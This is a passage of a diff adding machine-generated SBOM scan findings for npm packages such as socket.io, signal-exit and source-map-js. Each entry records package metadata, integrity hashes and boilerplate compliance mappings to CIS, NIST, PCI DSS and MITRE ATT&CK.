"object-inspect": "^1.13.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6c276e4fe79d17b1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: side-channel-weakmap 1.0.2", + "title": "side-channel-weakmap 1.0.2", + "description": "Package discovered: side-channel-weakmap 1.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3a35b0f8b53bc97a", + "name": "side-channel-weakmap", + "version": "1.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:side-channel-weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel-weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel_weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel_weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side-channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side_channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:side:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/side-channel-weakmap@1.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz", + "integrity": "sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.5", + "object-inspect": "^1.13.3", + "side-channel-map": "^1.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8acef3cde3b7b132", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: signal-exit 4.1.0", + "title": "signal-exit 4.1.0", + "description": "Package discovered: signal-exit 4.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a63ea3d2efb32143", + "name": "signal-exit", + "version": "4.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:signal-exit:signal-exit:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:signal-exit:signal_exit:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:signal_exit:signal-exit:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:signal_exit:signal_exit:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:signal:signal-exit:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:signal:signal_exit:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/signal-exit@4.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", + "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9476a789ac7d80fb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: simple-swizzle 0.2.4", + "title": "simple-swizzle 0.2.4", + "description": "Package discovered: simple-swizzle 0.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "cef7b2b2b70b3db8", + "name": "simple-swizzle", + "version": "0.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:simple-swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:simple-swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:simple_swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:simple_swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:simple:simple-swizzle:0.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:simple:simple_swizzle:0.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/simple-swizzle@0.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/simple-swizzle/-/simple-swizzle-0.2.4.tgz", + "integrity": "sha512-nAu1WFPQSMNr2Zn9PGSZK9AGn4t/y97lEm+MXTtUDwfP0ksAIX4nO+6ruD9Jwut4C49SB1Ws+fbXsm/yScWOHw==", + "dependencies": { + "is-arrayish": "^0.3.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ff9098f7bbabdf5b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: socket.io 4.8.3", + "title": "socket.io 4.8.3", + "description": "Package discovered: socket.io 4.8.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5cc521e50bb4314d", + "name": "socket.io", + "version": "4.8.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:socket:socket.io:4.8.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/socket.io@4.8.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/socket.io/-/socket.io-4.8.3.tgz", + "integrity": "sha512-2Dd78bqzzjE6KPkD5fHZmDAKRNe3J15q+YHDrIsy9WEkqttc7GY+kT9OBLSMaPbQaEd0x1BjcmtMtXkfpc+T5A==", + "dependencies": { + "accepts": "~1.3.4", + "base64id": "~2.0.0", + "cors": "~2.8.5", + "debug": "~4.4.1", + "engine.io": "~6.6.0", + "socket.io-adapter": "~2.5.2", + "socket.io-parser": "~4.2.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a08d32cd24a38070", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: socket.io-adapter 2.5.6", + "title": "socket.io-adapter 2.5.6", + "description": "Package discovered: socket.io-adapter 2.5.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "423a38d81e2dc8e3", + "name": "socket.io-adapter", + "version": "2.5.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:socket.io-adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io-adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io_adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io_adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io:socket.io-adapter:2.5.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io:socket.io_adapter:2.5.6:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/socket.io-adapter@2.5.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.5.6.tgz", + "integrity": "sha512-DkkO/dz7MGln0dHn5bmN3pPy+JmywNICWrJqVWiVOyvXjWQFIv9c2h24JrQLLFJ2aQVQf/Cvl1vblnd4r2apLQ==", + "dependencies": { + "debug": "~4.4.1", + "ws": "~8.18.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "126bbc6e6f7db2d9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: socket.io-client 4.8.3", + "title": "socket.io-client 4.8.3", + "description": "Package discovered: socket.io-client 4.8.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ecd3152d103ea0f9", + "name": "socket.io-client", + "version": "4.8.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:socket.io-client:socket.io-client:4.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io-client:socket.io_client:4.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io_client:socket.io-client:4.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io_client:socket.io_client:4.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io:socket.io-client:4.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:socket.io:socket.io_client:4.8.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/socket.io-client@4.8.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/socket.io-client/-/socket.io-client-4.8.3.tgz", + "integrity": "sha512-uP0bpjWrjQmUt5DTHq9RuoCBdFJF10cdX9X+a368j/Ft0wmaVgxlrjvK3kjvgCODOMMOz9lcaRzxmso0bTWZ/g==", + "dependencies": { + "@socket.io/component-emitter": "~3.1.0", + "debug": "~4.4.1", + "engine.io-client": "~6.6.1", + "socket.io-parser": "~4.2.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4e07aea60237064a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: socket.io-parser 4.2.6", + "title": "socket.io-parser 4.2.6", + "description": "Package discovered: socket.io-parser 4.2.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f9190921d6308e46", + "name": "socket.io-parser", + "version": "4.2.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:socket:socket.io-parser:4.2.6:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/socket.io-parser@4.2.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.2.6.tgz", + "integrity": "sha512-asJqbVBDsBCJx0pTqw3WfesSY0iRX+2xzWEWzrpcH7L6fLzrhyF8WPI8UaeM4YCuDfpwA/cgsdugMsmtz8EJeg==", + "dependencies": { + "@socket.io/component-emitter": "~3.1.0", + "debug": "~4.4.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1381d8de85a9f426", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: source-map-js 1.2.1", + "title": "source-map-js 1.2.1", + "description": "Package discovered: source-map-js 1.2.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ef14348a3e7aef73", + "name": "source-map-js", + "version": "1.2.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:source-map-js:source-map-js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:source-map-js:source_map_js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:source_map_js:source-map-js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:source_map_js:source_map_js:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": 